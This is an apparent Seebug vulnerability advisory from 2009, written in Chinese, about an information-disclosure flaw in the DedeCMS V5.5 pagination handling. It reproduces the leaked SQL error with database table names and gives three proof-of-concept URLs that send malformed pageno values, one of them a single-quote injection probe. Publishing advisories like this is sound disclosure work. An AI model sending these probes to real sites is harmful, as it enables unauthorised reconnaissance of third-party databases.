织梦(dedecms)V5.5分页处理函数信息泄露漏洞

2009-09-16T00:00:00
ID SSV:12328
Type seebug
Reporter Root
Modified 2009-09-16T00:00:00

Description

系统用intval对$pageno的值进行了处理,但是intval处理过程中,如果为非正整数时,会赋值为0,系统就会出错。 $pageno = isset($pageno) && is_numeric($pageno) ? max(1,$pageno) : 1;
没有对0进行过滤处理。

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-15,15' at line 7 - Execute Query False! Select arc.*, tp.typedir,tp.typename,tp.isdefault,tp.defaultname,tp.namerule,tp.namerule2,tp.ispart,tp.moresite,tp.siteurl from dede_archives arc left join dede_arctype tp on arc.typeid=tp.ID where arc.arcrank > -1 And (arc.typeid='10' Or arc.typeid2='10') order by arc.sortrank desc limit -15,15

dedecms V5.5 <br />等待官方补丁 www.dedecms.com

                                        
                                            
                                                http://www.dedecms.com/plus/list.php?tid=10&amp;pageno=0
http://www.dedecms.com/plus/list.php?tid=10&amp;pageno='
http://www.dedecms.com/plus/list.php?tid=10&amp;pageno=-1